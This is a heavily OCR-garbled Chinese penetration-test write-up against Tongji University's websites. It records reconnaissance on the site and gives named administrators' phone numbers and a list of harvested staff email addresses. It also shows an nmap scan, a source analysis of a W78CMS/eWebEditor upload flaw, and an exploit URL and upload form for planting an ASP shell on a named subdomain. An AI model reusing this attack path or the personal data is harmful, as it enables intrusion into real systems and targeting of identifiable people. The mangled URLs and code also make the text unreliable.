同济大学渗透测试报告评估人：Zvall目标：同济大学域名： www.tongji.edu.cn1信息收集收集www.tongji.edu.cn网站子站信息为后续渗透做好铺垫1.1 获取 IP： 使用 Ping 得到 IP 202.120.189.3 address:上海Ping 返回 Request timed out 不 排除有防火墙WAF等包过滤的可能1.2 Whois查询得到:网段：202.120.176.0 - 202.120.191.255管理员联系：Cui , Zijun (ZC3-CN) +86-21-6598-9006 技术人员联系：Wang , Zhengping (ZW2-CN)+86 21 65025080 ext. 2840最后更新记录在19970627 记录于19970627dns.tongji.edu.cn 202.120.191.30 dns1.tongji.edu.cn 202.120.191.208Mail:收集 222.66.109.6Mail 服务器：http:/mail.tongji.edu.cn 米用是的：网易 Coremail Java 写的 用xml的格式进行数据传递利用xml解析漏洞可能读取任意文件邮箱收集：碰过很多用邮箱前辍做密码的.qichetongji.edu.com antli8899163.com yangdykyahoo.com.cn xjzenglib.tongji.edu.cn tousutjce.tongji.edu.cn rscmail.tongji.edu.cn dxwgmail.tongji.edu.cn 100759tongji.edu.cn xinxihuatongji.edu.cn 3dtongji.edu.cn wuliruitongji.edu.cn xxgktongji.edu.cn helpdesktongji.edu.cn liushuyantongji.edu.cn gbttongji.edu.cn 092783tongji.edu子域：分布这个网段：202.120.189.3-202.120.189.255C段全部是WEB应用同服网站：http:/www.tongji.edu.cn http:/news.tongji.edu.cn http:/gandong.tongji.edu.cn http:/photo.tongji.edu.cn2.IP扫描nmap -sS -sV -P0 -T4 -O -A -F -sC -version-light -v www.tongji.edu.cn 80/tcp open http nginx 1.0.8I_http-methods: No Allow or Public header in OPTIONS response (status code 405) l_http-title: xE6xACxA2xE8xBFx8ExE8xAExBFxE9x97xAExE5x90x8CxE6x B5x8ExE5xA4xA7xE5xADxA6xE4xB8xBBxE9xAlxB5nix只对外开放一个80估计是Iptables策略信息收集的差不多这后由于主站只开放一个WEB应用只好转战WEB上来：1.3 Web服务评估：1. 查找指纹提交一个HEAD返回：Request sent. 238 bytes HTTP/1.1 200 OK Server: nginx/1.0.8 Date: Fri, 10 Aug 2012 09:53:41 GMT Content-Type: text/html Connection: keep-alive Vary: Accept-Encoding jp：37 - www. tong j i . edu. cn/f aculty/iriages/l_68 jpg* 1 112-93-10 18:4937 URL:http:/www.tongji.edujcn/faculty/images/l-?-jp： i.41 - www.tongj1.edu.cn/faculty/inages/l_77. jpg* 1 112-93-10 18 :4937 URL：http：/www.tongji.芒du：cn/f aculty/images/l_?8 jp： - www. tong j i . edu. cn/f aculty/inages/l_?8 jpg* 1 112-93-10 18:4937 URL：http：/www.tongji.edujcn/faculty/images/l-Sajp：用findstr找并没有找到HIDDEN字段在SC目录下找到一个asp的网站 测试了也没存在漏洞 还调用了防注入程序过滤GET POST COOKIE提交过来的数据 主站无果 旁站也没有可拿到shell的漏洞 现在只好渗透分站了Ip:202.120.189.3此站服务器上只有一个站点初步估计权限会很大好提权好吧就它了 先测试注入提交单引号：http:/celiang.tongji.edu.cn/clwww/shownews.asp?id=65居然玩跳转：后退+ Q冈園；岭恢厂收藏邀3止鱼)f eelgoogle. com/您指定的屈页无法访间！错误类型:连接失败提示：爆露了所用WEB程序为：W78cms如果直接跳转不用Response.End结束程序的话我们仍可以注入W78CMS存在一个上传漏洞：分析下源码：Sub InitUpload()sType = UCase(Trim(Request.QueryString(type)sStyleName = Trim(Request.QueryString(style)sCusDir = Trim(Request.QueryString(cusdir)sParamSYFlag = Trim(Request.QueryString(syflag)sCusDir = Replace(sCusDir, , /)If Left(sCusDir, 1) = / Or Left(sCusDir, 1) = . Or Right(sCusDir, 1) = . Or InStr(sCusDir, ./) 0 Or InStr(sCusDir, /.) 0 Or InStr(sCusDir, /) 0 ThensCusDir =这里程序员只考虑到了跨目录的问题End IfDim i, aStyleConfig, bValidStylebValidStyle = FalseFor i = 1 To Ubound(aStyle)aStyleConfig = Split(aStyle(i), III)If Lcase(sStyleName) = Lcase(aStyleConfig(O) ThenbValidStyle = TrueExit ForEnd IfNextIf bValidStyle = False ThenOutScript(parent.UploadError(style)End IfsBaseUrl = aStyleConfig(19)nUploadObject = Clng(aStyleConfig(20)nAutoDir = CLng(aStyleConfig(21)sUploadDir = aStyleConfig(3)If sBaseUrlv3 ThenIf Left(sUploadDir, 1) / ThensUploadDir =./ & sUploadDirEnd IfEnd IfSelect Case sBaseUrlCase 0, 3sContentPath = aStyleConfig(23)Case 1sContentPath = RelativePath2RootPath(sUploadDir)Case 2sContentPath = RootPath2DomainPath(RelativePath2RootPath(sUploadDir)End SelectIf sBaseUrlv3 ThensUploadDir = Server.Mappath(sUploadDir)这里创建目录End IfIf Right(sUploadDir,l)v ThensUploadDir = sUploadDir & End If很明显 程序员只考虑到跨目录的漏洞没有过滤点号最后创目录结合IIS解析漏洞 导致漏 洞形成 漏洞修复方法：sCusDir = Replace(sCusDir, .,)漏洞利用：http:/celiang.tongji.edu.cn/clwww/admin/w78eWebEditor/asp/upload.asp7actionMsave&type=image& popup&cusdir=Zvall.asp这时程序会在uploadfile目下创建一个名为Zvall.asp的文件夹vformaction=http:/celiang.tongji.edu.cn/clwww/admin/w78eWebEditor/asp/upload.asp?action=save&type =image&popup&cusdir=Zvall.asp method=post name=myform enctype=multipart/form-datavbrvbr扔件编劉E)格式查看帮肋clwww/upl(jadFilp/1_asp/2B1208/2O12081U172949606_giF；htmleWebEditormeta http-equiu= Cfjnteni :ha AUFhE日dAUtJotiyAUs匚广ip